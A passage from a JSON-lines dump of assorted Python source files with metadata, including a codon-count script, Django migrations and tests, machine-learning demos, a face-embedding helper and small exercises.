\"T\\nAG\"\r\n OffTAG3 = (open(filename, 'r').read().count(substringOffTAG3))\r\n OffTAG = OffTAG1 + OffTAG2 + OffTAG3\r\n#OffFrameTAA\r\n substringOffTAA1 = \"TAA\"\r\n OffTAA1 = (open(filename, 'r').read().count(substringOffTAA1))\r\n substringOffTAA2 = \"TA\\nA\"\r\n OffTAA2 = (open(filename, 'r').read().count(substringOffTAA2))\r\n substringOffTAA3 = \"T\\nAA\"\r\n OffTAA3 = (open(filename, 'r').read().count(substringOffTAA3))\r\n OffTAA = OffTAA1 + OffTAA2 + OffTAA3\r\n#OffFrame Ratio\r\n OffRatioTGA = OffTGA / (OffTGA + OffTAG + OffTAA)\r\n OffRatioTAG = OffTAG / (OffTGA + OffTAG + OffTAA)\r\n OffRatioTAA = OffTAA / (OffTGA + OffTAG + OffTAA)\r\n\r\n#Writes analysis into csv\r\n 
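#The tuple below follows the header row written above: raw counts, canonical stop-codon ratios, GC fraction, off-frame stop counts and ratios, then per-nucleotide totals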
analyzed = (filename, Total, Uncounted, RatioUncounted, TGA, TAG, TAA, RatioTGA, RatioTAG, RatioTAA, GC, OffTGA, OffTAG, OffTAA, OffRatioTGA, OffRatioTAG, OffRatioTAA, CDSG, CDSC, CDSA, CDST)\r\n#This will write a file named Analyzed.csv in write mode and wont add a newline between writerow's\r\n with open('AnalyzedCDS.csv', 'a', newline='') as csvfile:\r\n writer = csv.writer(csvfile)\r\n writer.writerow(analyzed)\r\n","sub_path":"RawData/ViralAnalysis/CDSAnalysis.py","file_name":"CDSAnalysis.py","file_ext":"py","file_size_in_byte":3637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"557515370","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('core', '0018_glyc_profile'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='profile',\n name='glyc',\n ),\n migrations.AlterField(\n model_name='glyc',\n name='id_user',\n field=models.AutoField(serialize=False, primary_key=True),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='glyc',\n name='time',\n field=models.DateTimeField(default=datetime.datetime(2015, 3, 23, 17, 27, 7, 157000)),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='profile',\n name='birth',\n field=models.DateField(default=datetime.datetime(2015, 3, 23, 17, 27, 7, 157000)),\n preserve_default=True,\n ),\n ]\n","sub_path":"diabon/core/migrations/0019_auto_20150323_1727.py","file_name":"0019_auto_20150323_1727.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"200350352","text":"import numpy\nimport tensorflow as tf\nimport cliffordConvolution as cc\nimport scipy.ndimage\nimport time\nimport operator\nfrom functools import reduce\n\ninpt2 = tf.placeholder(tf.float32, [32,56,56,32,4])\nindexes2 = tf.placeholder(tf.int32, [32,56,56,32])\n\n# with tf.device('gpu:0'):\n# \tout2 = cc.ops.reduceIndex(inpt2, indexes2)\n\nwith tf.device('cpu:0'):\n\tmid2 = cc.ops.reduceIndex(inpt2, indexes2)\n\tout2 = cc.ops.expandIndex(mid2, indexes2, inpt2)\n\nwith tf.device('gpu:0'):\n\tmid = cc.ops.reduceIndex(inpt2, indexes2)\n\tout = cc.ops.expandIndex(mid, indexes2, inpt2)\n\n\ninum = numpy.ones([32,56,56,32], dtype=numpy.int32)\nii = numpy.zeros([32,56,56,32,4], dtype=numpy.float32)\nn = 1\nfor i in range(inum.shape[0]):\n\tfor j in range(inum.shape[1]):\n\t\tfor k in range(inum.shape[2]):\n\t\t\tfor l in range(inum.shape[3]):\n\t\t\t\tind = (numpy.random.rand(1)*4).astype(numpy.int32)[0]\n\t\t\t\tii[i,j,k,l,ind] = n\n\t\t\t\tinum[i,j,k,l] = ind\n\t\t\t\tn += 1\n\n# ii[:,:,:,:,0] = 10\n# ii[:,:,:,:,1] = 0\n# ii[:,:,:,:,2] = 5\n# ii[:,:,:,:,3] = 20\n# i[0] = 0\n# i[1] = 1\n# i[2] = 2\n# i[3] = 3\n\n\nsess = tf.Session()\n\nst1 = time.time()\na = sess.run([mid, out], feed_dict={inpt2: ii, indexes2: inum})\nt1 = time.time()-st1\n\n\na2 = sess.run([mid2, out2], feed_dict={inpt2: ii, indexes2: inum})\n\nnumpy.sum(a[1] != ii)\nnumpy.sum(a2[1] != ii)\n\nfor i in range(a2.shape[0]):\n\tfor j in range(a2.shape[1]):\n\t\tfor k in range(a2.shape[2]):\n\t\t\tfor l in range(a2.shape[3]):\n\t\t\t\tprint(a2[i,j,k,l])\n\nfor i in range(ii.shape[0]):\n\tfor j in range(ii.shape[1]):\n\t\tfor k in range(ii.shape[2]):\n\t\t\tfor l in range(ii.shape[3]):\n\t\t\t\tfor m in 
range(ii.shape[4]):\n\t\t\t\t\tprint(ii[i,j,k,l,m])\n\n\n0.24456501007080078\n0.24431443214416504","sub_path":"tests/testExpandIndex.py","file_name":"testExpandIndex.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"561014512","text":"import pandas as pd\r\nimport numpy as np\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn import linear_model\r\n\r\n#create the regressionline function that will plot the regression line\r\ndef regressionline(model,datatest,labeltest,title):\r\n\tfig = plt.figure()\r\n\tax = fig.add_subplot(111)\r\n\tax.scatter(datatest,labeltest,c='b',alpha=0.5)\r\n\tax.plot(datatest,model.predict(datatest),c ='r', alpha=0.7)\r\n\tscore = model.score(datatest,labeltest)\r\n\ttitle += \" score(R2) :\"+str(score)\r\n\tax.set_title(title)\r\n\t\r\n\t\r\n\tplt.show()\r\n\t\r\n\r\n#load the csv dataset into a variable dataset\r\n\r\ndataset = pd.read_csv('day.csv', index_col=0)\r\n\r\n\t\r\nprint(dataset.head(10))\r\nprint(dataset.describe())\r\n#print(dataset.dtypes)\r\n\r\ndataset.dteday= pd.to_datetime(dataset.dteday)\r\n\r\n#print(dataset.dtypes)\r\n#print(dataset.isna().sum())\r\n#print(dataset.corr())\r\n#exit()\r\n\r\n#dataset1 = pd.concat([dataset.atemp,dataset.hum,],axis= 1)\r\n#print(dataset1.head())\r\n#dataset1.plot.hist(alpha=0.5)\r\n#plt.show()\r\n#exit()\r\n\t\r\n\t\r\ndef predict_atemp(p_atemp):\r\n\r\n\tif p_atemp > 0.840896 or p_atemp < 0.079070:\r\n\t\traise ValueError('atemp should be the value between 0.840896 and 0.079070')\r\n\t\r\n\t#prepare the training data with corresponding labels for modeling the data\r\n\t\r\n\tdataset_train=dataset.atemp[dataset.dteday < '2011-12-31']\r\n\tdataset_train = dataset_train.to_frame()\r\n\tlabel_train=dataset.cnt[dataset.dteday < '2011-12-31']\r\n\t#print(type(dataset_train))\r\n\t#exit()\r\n\t\r\n\t#create the linear regression model and save into the variable model and fit the training data into it and pass it\r\n\t#to the regressionline\r\n\tmodel = linear_model.LinearRegression()\r\n\tmodel.fit(dataset_train,label_train)\r\n\tregressionline(model,dataset_train,label_train,\"count for temperature(atemp)\")\r\n\t\r\n\t#test_atemp=0.229270\r\n\ttest_atemp=p_atemp\r\n\tpredict_cnt= model.predict([[test_atemp]])[0]\r\n\t\r\n\tprint(\"count(atemp), R2: \",model.score(dataset_train,label_train))\r\n\tprint(\"for atemp {0} predicted count is {1}\".format(test_atemp,int(predict_cnt)))\r\n\treturn int(predict_cnt)\r\n\t\r\n\t#if you want predict count for the value within the dataset,you have the actual count as well then you can uncomment the line here\r\n\t\r\n\t#actual_cnt=1600\r\n\t#print(\"for atemp {0} actual count is {1}\".format(test_atemp,actual_cnt))\r\n\r\ndef predict_hum(p_hum):\r\n\t\r\n\tif p_hum > 0.972500 or p_hum < 0.000000:\r\n\t\traise ValueError('hum should be the value between 0.000000 and 0.972500')\r\n\t\r\n\t#prepare the training data with corresponding labels for modeling the data\r\n\t\r\n\tdataset_train=dataset.hum[dataset.dteday < '2011-12-31']\r\n\tdataset_train = dataset_train.to_frame()\r\n\tlabel_train=dataset.cnt[dataset.dteday < '2011-12-31']\r\n\t#print(type(dataset_train))\r\n\t#exit()\r\n\t\r\n\t#create the linear regression model and save into the variable model and fit the training data into it and pass it\r\n\t#to the regressionline\r\n\tmodel = linear_model.LinearRegression()\r\n\tmodel.fit(dataset_train,label_train)\r\n\tregressionline(model,dataset_train,label_train,\"count for temperature(hum)\")\r\n\t\r\n\t#test_atemp=0.229270\r\n\ttest_hum=p_hum\r\n\tpredict_cnt= model.predict([[test_hum]])[0]\r\n\t\r\n\tprint(\"count(hum), R2: 
\",model.score(dataset_train,label_train))\n\tprint(\"for hum {0} predicted count is {1}\".format(test_hum,int(predict_cnt)))\n\treturn int(predict_cnt) \n\t\n\t\n \t\ndef predict_windspeed(p_windspeed):\n\n\tif p_atemp > 0.507463 or p_atemp < 0.022392:\n\t\traise ValueError('windspeed should be the value between 0.022392 and 0.507463')\n\n\t\n\tdataset_train=dataset.windspeed[dataset.dteday < '2011-12-31']\n\tdataset_train = dataset_train.to_frame()\n\tlabel_train=dataset.cnt[dataset.dteday < '2011-12-31']\n\t\n\tmodel = linear_model.LinearRegression()\n\tmodel.fit(dataset_train,label_train)\n\tregressionline(model,dataset_train,label_train,\"count for windspeed\")\n\t\n\ttest_windspeed=p_windspeed\n\t#actual_cnt=1600\n\tpredict_cnt= model.predict([[test_windspeed]])[0]\n\t\n\tprint(\"count(windspeed), R2: \",model.score(dataset_train,label_train))\n\tprint(\"for windspeed {0} predicted count is {1}\".format(test_windspeed,int(predict_cnt)))\n\t#print(\"for windspeed {0} actual count is {1}\".format(test_windspeed,actual_cnt))\n\treturn int(predict_cnt)","sub_path":"src/day.py","file_name":"day.py","file_ext":"py","file_size_in_byte":4030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"330211290","text":"'''\nFile Name: writeCSV.py\nDescription:\n@author:czf\nCreated on 16:45 12-02 2018\n'''\n\nimport csv\n\ndef writeCsv(path, data):\n with open(path, \"w\") as f:\n writer = csv.writer(f)\n for rowData in data:\n writer.writerow(rowData)\n\n\npath = r\"\"\nwriteCsv(path, [[], [], []])","sub_path":"writeCSV.py","file_name":"writeCSV.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"332979921","text":"from fila import Fila\r\nfrom random import randint\r\nfrom time import sleep\r\nimport sys\r\n\r\nfilaBanco = Fila()\r\n\r\ndef EntrarNaFila(cliente):\r\n print(\"Cliente entrando na fila do caixa...\")\r\n filaBanco.ENQUEUE(cliente)\r\n\r\ndef Atender():\r\n for i in range(filaBanco.LENGTH()):\r\n cliente = filaBanco.DEQUEUE()\r\n \r\n tempo_Atendimento = randint(1,10)\r\n print(\"Cliente sendo atendido...\\n\")\r\n\r\n sleep(tempo_Atendimento)\r\n print(\"Atendimento terminado!\\n\")\r\n print(\"O atendimento demorou %d minutos. 
\"%(tempo_Atendimento))\r\n \r\n \r\n\r\ndef Sair():\r\n print(\"Saindo...\")\r\n sys.exit()\r\n\r\ndef main(): \r\n print(\"-------------- BANCO--------------\\n\")\r\n print(\"TECLE: \\n\", \"1- Entrar na fila do caixa de atendimento\\n\", \"2- Atendimento\\n\",\"3- Sair.\\n\")\r\n\r\n comando = int(input(\"Tecle o número do comando que voce deseja utilizar: \\n\"))\r\n\r\n \r\n while comando !=3:\r\n if comando == 1:\r\n cliente = input(\"Informe o nome do cliente: \")\r\n EntrarNaFila(cliente)\r\n \r\n comando = int(input(\"Tecle o número do comando que quer utilizar: \\n\"))\r\n \r\n\r\n if comando == 2:\r\n Atender()\r\n\r\n elif comando == 3:\r\n Sair()\r\n \r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"AtividadeFila2/Atividade Fila 02/Questão 04.py","file_name":"Questão 04.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"305762289","text":"import pandas as pd\nimport numpy as np\nimport streamlit as st\n\nst.sidebar.title(\"LyricsMatch\")\n\nst.sidebar.info(\"This is a POC application for LyricsMatch.\")\n\nenglish_lyrics = pd.read_csv(\"english_lyrics_first50.csv\")\nenglish_lyrics = english_lyrics[english_lyrics['lang'] == 'en']\n\nhindi_lyrics = pd.read_csv(\"experiments/data/hindilyrics_pratik.csv\")\n\nimport numpy as np\ndim = 1024\n\nhindi_embeddings = np.fromfile(\"experiments/data/embeddings/pratik_hindi_embeddings.raw\", dtype=np.float32, count=-1)\nhindi_embeddings.resize(hindi_embeddings.shape[0] // dim, dim)\n\nenglish_embeddings = np.load(\"english_embeddings.npy\")\n# english_embeddings.resize(english_embeddings.shape[0] // dim, dim)\n\nd=1024\nimport faiss # make faiss available\nindex = faiss.IndexFlatL2(d) # build the index\n# print(index.is_trained)\nindex.add(hindi_embeddings) # add vectors to the index\n# print(index.ntotal)\n\nselect = st.sidebar.selectbox(\"Pick a song.\", english_lyrics[\"song\"][:100])\nselected_index = english_lyrics[english_lyrics[\"song\"]==select].index[0]\n\nst.write(select)\nst.text(english_lyrics[english_lyrics[\"song\"]==select].iloc[0][\"lyrics\"])\n\nk = 3 # we want to see 4 nearest neighbors\nD, I = index.search(english_embeddings[selected_index:selected_index+1], k) \n\nfor s_no,i in enumerate(I[0]):\n st.text(\"Similar Song Discovered : \" + str(s_no+1))\n st.text(hindi_lyrics.iloc[i]['Song'])","sub_path":"heroku/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"489777427","text":"# LAB EXERCISE 04\nprint('Lab Exercise 04 \\n')\n\n# Setup\ngrammy_winners = [\n [\"Whitney Houston\", \"Pop\", 6],\n [\"Michael Jackson\", \"Pop\", 19],\n [\"Carrie Underwood\", \"Country\", 7],\n [\"Adell\", \"Soul\", 15],\n [\"Beyonce\", \"Pop\", 20],\n [\"Kendrick Lamar\", \"Hip-Hop\", 12],\n [\"Drake\", \"R&B Rap\", 5]\n ]\n\n# Problem 01 (3 points)\n\nartist_names = []\n\n\n# Problem 02 (3 points)\n\npop_genre = []\n\n\n# Problem 03 (4 points)\n\ngrammy_count_diff = 0\n\n\n# Problem 04 (5 points)\n\nfive_to_seven_grammies = []\n\n\n# Problem 05 (5 points)\n\ntop_artist = None\ncount = 0\n","sub_path":"lab_exercise_04/lab_exercise_04.py","file_name":"lab_exercise_04.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"162695921","text":"for i in range(4):\r\n print(\"hello! 
world\")\r\n\r\ndef repeat(x):\r\n size = len(x)\r\n repeated = []\r\n for i in range(size):\r\n k = i + 1\r\n for j in range(k,size):\r\n if x[i] == x[j] and x[i] not in repeated:\r\n repeated.append(x[i])\r\n return repeated\r\n\r\n \r\nlst = [10,20,50,30,10,20,20,40]\r\nprint(repeat(lst))\r\n\r\ndef group(l,n):\r\n for i in range(0,len(l),n):\r\n yield l[i:i + n]\r\n\r\nn = 5\r\nmy_list = [2,5,6,8,3,3,4,3,7,5]\r\nx = list(group(my_list,n))\r\nprint(x)\r\n\r\n \r\ndef lensort(list2):\r\n plist = sorted(list2,key=len)\r\n return plist\r\nlist2 = ['sana','karan','gaurav','shrotriya','aggarwal']\r\nprint(lensort(list2))\r\n","sub_path":"lab2.python.py","file_name":"lab2.python.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"69062100","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n#dataset\nnum_of_sam = 40\nstd_dv = 1.8\n\ngroup1 = np.array([0,0])+np.random.randn(num_of_sam, 2)*std_dv\ngroup2 = np.array([5,5])+np.random.randn(num_of_sam, 2)*std_dv\ngroup3 = np.array([5,-5])+np.random.randn(num_of_sam, 2)*std_dv\ngroup4 = np.array([-5,-5])+np.random.randn(num_of_sam, 2)*std_dv\ngroup5 = np.array([-5,5])+np.random.randn(num_of_sam, 2)*std_dv\nX = np.vstack((group1, group2, group3, group4, group5))\n\nt_group1 = np.tile([0,0,0,0,1],(num_of_sam,1))\nt_group2 = np.tile([0,0,0,1,0],(num_of_sam,1))\nt_group3 = np.tile([0,0,1,0,0],(num_of_sam,1))\nt_group4 = np.tile([0,1,0,0,0],(num_of_sam,1))\nt_group5 = np.tile([1,0,0,0,0],(num_of_sam,1))\nT = np.vstack((t_group1, t_group2, t_group3, t_group4, t_group5))\n\n#function\ndef softmax(x):\n return np.exp(x) / np.sum(np.exp(x), axis=1, keepdims=True)\n\ndef loss(y, t):\n return -np.sum(np.multiply(t, np.log(y)) + np.multiply((1 - t), np.log(1 - y)))\n\n#initial setting\nW = np.random.randn(2,5)\nB = np.random.randn(1,5)\n\nlearning_rate = 0.003\nE_save = []\n\n#iteration\nnum_of_itr = 400\nfor i in range(num_of_itr):\n #forward propagation\n Y = softmax(np.dot(X, W)+B)\n E = loss(Y, T)\n E_save = np.append(E_save, E)\n #back propagation\n dW = X.T.dot(Y-T)\n dB = np.sum(Y-T, axis=0, keepdims=True)\n #update\n W = W - learning_rate*dW\n B = B - learning_rate*dB\n\n#plot\ngrid_range = 10\nresolution = 50\nx1_grid = x2_grid = np.linspace(-grid_range, grid_range, resolution)\n\nxx, yy = np.meshgrid(x1_grid, x2_grid)\nX_grid = np.c_[xx.ravel(), yy.ravel()]\n\nY_grid = softmax(np.dot(X_grid, W)+B)\nY_predict = np.around(Y_grid)\n\nout_connect = np.hstack((X_grid,Y_predict))\nblue_group = out_connect[out_connect[:,2]==1]\ngreen_group = out_connect[out_connect[:,3]==1]\nred_group = out_connect[out_connect[:,4]==1]\nblack_group = out_connect[out_connect[:,5]==1]\nyellow_group = out_connect[out_connect[:,6]==1]\n\nplt.figure()\nplt.xlim(-grid_range,grid_range)\nplt.ylim(-grid_range,grid_range)\nplt.grid(True)\nplt.title(\"Deep 
Learning\")\nplt.xlabel(\"input(x1)\")\nplt.ylabel(\"input(x2)\")\n\n#plot_dataset\nplt.scatter(group1[:,0],group1[:,1],marker='o',color='yellow')\nplt.scatter(group2[:,0],group2[:,1],marker='o',color='black')\nplt.scatter(group3[:,0],group3[:,1],marker='o',color='red')\nplt.scatter(group4[:,0],group4[:,1],marker='o',color='green')\nplt.scatter(group5[:,0],group5[:,1],marker='o',color='blue')\n\n#plot_output\nplt.scatter(blue_group[:,0],blue_group[:,1],marker='o',alpha=0.3,color='blue')\nplt.scatter(red_group[:,0],red_group[:,1],marker='o',alpha=0.3,color='red')\nplt.scatter(green_group[:,0],green_group[:,1],marker='o',alpha=0.3,color='green')\nplt.scatter(black_group[:,0],black_group[:,1],marker='o',alpha=0.3,color='black')\nplt.scatter(yellow_group[:,0],yellow_group[:,1],marker='o',alpha=0.3,color='yellow')\n\nplt.show()\n\n#plot_loss\nplt.figure()\nplt.grid(True)\nplt.title(\"LOSS FUNCTION\")\nplt.xlabel(\"Iteration number\")\nplt.ylabel(\"loss value\")\nplt.ylim(0,50)\nplt.plot(E_save)\nplt.show()\n","sub_path":"mondai3_4_2.py","file_name":"mondai3_4_2.py","file_ext":"py","file_size_in_byte":3011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"139227238","text":"#!/usr/bin/env python2\nimport time\nimport argparse\nimport cv2\nimport itertools\nimport os\n\nimport numpy as np\nfrom scipy import misc\n\nimport openface\nimport redis\nimport pickle\nfrom PIL import Image\n\n\nclass load_lib(object):\n def __init__(self, face_cascade, network_model, dlib_face_predictor, dim=96):\n self.face_cascade = cv2.CascadeClassifier(face_cascade)\n self.net = openface.TorchNeuralNet(network_model, dim)\n self.align = openface.AlignDlib(dlib_face_predictor)\n pool = redis.ConnectionPool(host='localhost', port=6379, db=0)\n self.r = redis.Redis(connection_pool=pool)\n self.dim = dim\n\n def face_detect(self, img):\n faces = self.face_cascade.detectMultiScale(img, 1.3, 5)\n list_face = []\n for (x,y,w,h) in faces:\n sub_face = img[y:y+h, x:x+w]\n if sub_face.shape[0] > self.dim and sub_face.shape[1] > self.dim:\n cropped = misc.imresize(sub_face, (self.dim, self.dim), interp='bilinear')\n list_face.append(cropped)\n return list_face\n\n def align_function(self,img):\n # aligned_face = self.align.align(self.dim, img,landmarkIndices=openface.AlignDlib.INNER_EYES_AND_BOTTOM_LIP)\n aligned_face = self.align.align(self.dim, img,landmarkIndices=openface.AlignDlib.INNER_EYES_AND_BOTTOM_LIP)\n return aligned_face\n\n def get_vector(self,img):\n vector = self.net.forward(img)\n return vector\n\n def save_redis(self,img,vector):\n self.r.set(img,pickle.dumps(vector))\n\n\nif __name__ == '__main__':\n lib = load_lib(face_cascade='/home/dsvn/workspace/openface/models/dlib/haarcascade_frontalface_default.xml'\n , networkModel='/home/dsvn/workspace/openface/models/openface/nn4.small2.v1.t7'\n , dlibFacePredictor='/home/dsvn/workspace/openface/models/dlib/shape_predictor_68_face_landmarks.dat')\n \n #########\n img_path = '/home/dsvn/Documents/hongnt/fb_image/HA_Phuong_Thao_files/476_221171921357240_1689212226_n.jpg'\n im = np.asarray(Image.open(img_path))\n face = lib.face_detect(im)\n for i in range(len(face)):\n misc.imsave(\"test_\"+str(i)+\".png\", face[i])\n face_align = lib.align_function(np.array(face[i]))\n if face_align is not None:\n vector = lib.get_vector(face_align)\n lib.save_redis(img_path+\".\"+str(i) 
,vector)\n\n","sub_path":"lib/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"34173595","text":"# ------------------------------------------------------------------------------\n# Test Postponement Page\n# ------------------------------------------------------------------------------\nimport sys\nimport pytz\nimport datetime as dt\nfrom django.test import RequestFactory, TestCase\nfrom django.contrib.auth.models import User\nfrom django.utils import timezone\nfrom wagtail.core.models import Page\nfrom ls.joyous.models.calendar import GeneralCalendarPage\nfrom ls.joyous.models.events import RecurringEventPage\nfrom ls.joyous.models.events import PostponementPage\nfrom ls.joyous.models.events import CancellationPage\nfrom ls.joyous.utils.recurrence import Recurrence, WEEKLY, MO, WE, FR\n\n\nclass TestPostponement(TestCase):\n def setUp(self):\n self.home = Page.objects.get(slug='home')\n self.user = User.objects.create_user('j', 'j@joy.test', 's3(r3t')\n self.request = RequestFactory().get(\"/test\")\n self.request.user = self.user\n self.request.session = {}\n self.calendar = GeneralCalendarPage(owner = self.user,\n slug = \"events\",\n title = \"Events\")\n self.home.add_child(instance=self.calendar)\n self.calendar.save_revision().publish()\n self.event = RecurringEventPage(slug = \"test-meeting\",\n title = \"Test Meeting\",\n repeat = Recurrence(dtstart=dt.date(1990,1,1),\n freq=WEEKLY,\n byweekday=[MO,WE,FR]),\n time_from = dt.time(13,30),\n time_to = dt.time(16))\n self.calendar.add_child(instance=self.event)\n self.postponement = PostponementPage(owner = self.user,\n overrides = self.event,\n except_date = dt.date(1990,10,10),\n cancellation_title = \"Meeting Postponed\",\n cancellation_details =\n \"The meeting has been postponed until tomorrow\",\n postponement_title = \"A Meeting\",\n date = dt.date(1990,10,11),\n time_from = dt.time(13),\n time_to = dt.time(16,30),\n details = \"Yes a test meeting on a Thursday\")\n self.event.add_child(instance=self.postponement)\n self.postponement.save_revision().publish()\n\n def testGetEventsByDay(self):\n events = RecurringEventPage.events.byDay(dt.date(1990,10,1),\n dt.date(1990,10,31))\n self.assertEqual(len(events), 31)\n evod = events[9]\n self.assertEqual(evod.date, dt.date(1990,10,10))\n self.assertEqual(len(evod.days_events), 1)\n self.assertEqual(len(evod.continuing_events), 0)\n title, page = evod.days_events[0]\n self.assertEqual(title, \"Meeting Postponed\")\n self.assertIs(type(page), CancellationPage)\n self.assertIs(type(page.postponementpage), PostponementPage)\n\n events = PostponementPage.events.byDay(dt.date(1990,10,1),\n dt.date(1990,10,31))\n self.assertEqual(len(events), 31)\n evod = events[10]\n self.assertEqual(evod.date, dt.date(1990,10,11))\n self.assertEqual(len(evod.days_events), 1)\n self.assertEqual(len(evod.continuing_events), 0)\n title, page = evod.days_events[0]\n self.assertEqual(title, \"A Meeting\")\n self.assertIs(type(page), PostponementPage)\n\n def testStatus(self):\n self.assertEqual(self.postponement.status, \"finished\")\n self.assertEqual(self.postponement.status_text, \"This event has finished.\")\n now = timezone.localtime()\n myday = now.date() + dt.timedelta(1)\n friday = myday + dt.timedelta(days=(4-myday.weekday())%7)\n futureEvent = PostponementPage(owner = self.user,\n overrides = self.event,\n except_date = friday,\n cancellation_title = \"\",\n 
cancellation_details = \"\",\n postponement_title = \"Tuesday Meeting\",\n date = friday + dt.timedelta(days=4),\n time_from = dt.time(13,30),\n time_to = dt.time(16),\n details = \"The meeting postponed from last Friday\")\n self.event.add_child(instance=futureEvent)\n self.assertIsNone(futureEvent.status)\n self.assertEqual(futureEvent.status_text, \"\")\n\n def testWhen(self):\n self.assertEqual(self.postponement.when, \"Thursday 11th of October 1990 at 1pm to 4:30pm\")\n\n def testAt(self):\n self.assertEqual(self.postponement.at.strip(), \"1pm\")\n nextDate = self.event.next_date\n newDate = nextDate + dt.timedelta(1)\n reschedule = PostponementPage(owner = self.user,\n overrides = self.event,\n except_date = nextDate,\n cancellation_title = \"\",\n cancellation_details = \"\",\n postponement_title = \"Early Meeting\",\n date = newDate,\n time_from = dt.time(8,30),\n time_to = dt.time(11),\n details = \"The meeting will be held early tomorrow\")\n self.event.add_child(instance=reschedule)\n nextOn = self.event._nextOn(self.request)\n url = \"/events/test-meeting/{}-postponement/\".format(nextDate)\n self.assertEqual(nextOn[:76], ''.format(url))\n self.assertEqual(nextOn[-4:], '')\n parts = nextOn[76:-4].split()\n self.assertEqual(len(parts), 6)\n self.assertEqual(parts[0], \"{:%A}\".format(newDate))\n self.assertEqual(int(parts[1][:-2]), newDate.day)\n self.assertIn(parts[1][-2:], [\"st\", \"nd\", \"rd\", \"th\"])\n self.assertEqual(parts[2], \"of\")\n self.assertEqual(parts[3], \"{:%B}\".format(newDate))\n self.assertEqual(parts[4], \"at\")\n self.assertEqual(parts[5], \"8:30am\")\n\n\nclass TestPostponementTZ(TestCase):\n def setUp(self):\n self.home = Page.objects.get(slug='home')\n self.user = User.objects.create_user('j', 'j@joy.test', 's3(r3t')\n self.calendar = GeneralCalendarPage(owner = self.user,\n slug = \"events\",\n title = \"Events\")\n self.home.add_child(instance=self.calendar)\n self.calendar.save_revision().publish()\n self.event = RecurringEventPage(slug = \"test-meeting\",\n title = \"Test Meeting\",\n repeat = Recurrence(dtstart=dt.date(1990,1,1),\n freq=WEEKLY,\n byweekday=[MO,WE,FR]),\n time_from = dt.time(13,30),\n time_to = dt.time(16),\n tz = pytz.timezone(\"US/Eastern\"))\n self.calendar.add_child(instance=self.event)\n self.postponement = PostponementPage(owner = self.user,\n overrides = self.event,\n postponement_title = \"Delayed Meeting\",\n except_date = dt.date(1990,10,10),\n date = dt.date(1990,10,11),\n time_from = dt.time(13),\n time_to = dt.time(16,30))\n self.event.add_child(instance=self.postponement)\n self.postponement.save_revision().publish()\n\n @timezone.override(\"Pacific/Auckland\")\n def testLocalTitle(self):\n self.assertEqual(self.postponement.title,\n \"Postponement for Wednesday 10th of October 1990\")\n self.assertEqual(self.postponement.localTitle,\n \"Postponement for Thursday 11th of October 1990\")\n\n @timezone.override(\"Asia/Colombo\")\n def testGetEventsByDay(self):\n events = PostponementPage.events.byDay(dt.date(1990,10,1),\n dt.date(1990,10,31))\n self.assertEqual(len(events), 31)\n evod0 = events[10]\n self.assertEqual(evod0.date, dt.date(1990,10,11))\n self.assertEqual(len(evod0.days_events), 1)\n self.assertEqual(len(evod0.continuing_events), 0)\n title, page = evod0.days_events[0]\n self.assertEqual(title, \"Delayed Meeting\")\n self.assertIs(type(page), PostponementPage)\n evod1 = events[11]\n self.assertEqual(evod1.date, dt.date(1990,10,12))\n self.assertEqual(len(evod1.days_events), 0)\n 
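# In Asia/Colombo (UTC+5:30) the 1pm-4:30pm US/Eastern postponement starts at 10:30pm local time and runs past midnight, so 12 October lists it as a continuing event rather than a day's event: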
self.assertEqual(len(evod1.continuing_events), 1)\n title, page = evod1.continuing_events[0]\n self.assertEqual(title, \"Delayed Meeting\")\n self.assertIs(type(page), PostponementPage)\n","sub_path":"ls/joyous/tests/test_postponement.py","file_name":"test_postponement.py","file_ext":"py","file_size_in_byte":9825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"447538818","text":"# -*- coding: utf-8 -*-\r\n#----------------------------------------\r\n# ■ 精度評価\r\n#----------------------------------------\r\n\r\nimport os\r\nimport argparse\r\nimport codecs\r\n\r\nimport io_result\r\nimport io_label\r\n\r\n# 出力ファイル名\r\nOUT_FILE_NAME = [\"accuracy.txt\", \"un-detection.txt\", \"mis-detection.txt\"]\r\n\r\n#==============================================\r\n# 実行時パラメータ設定\r\n#==============================================\r\ndef init_args():\r\n parser = argparse.ArgumentParser()\r\n \r\n parser.add_argument(\"-labelfile\", dest = \"label_file\", type = str, help = \"label file path\", required = True)\r\n parser.add_argument(\"-resultfile\", dest = \"result_file\", type = str, help = \"result file path\", required = True)\r\n parser.add_argument(\"-o\", dest = \"output_dir\", type = str, help = \"output directory\", required = True)\r\n \r\n return parser.parse_args()\r\n\r\n#==============================================\r\n# 改行付きファイル出力\r\n#==============================================\r\ndef writeLine(fp, string):\r\n fp.write(string + 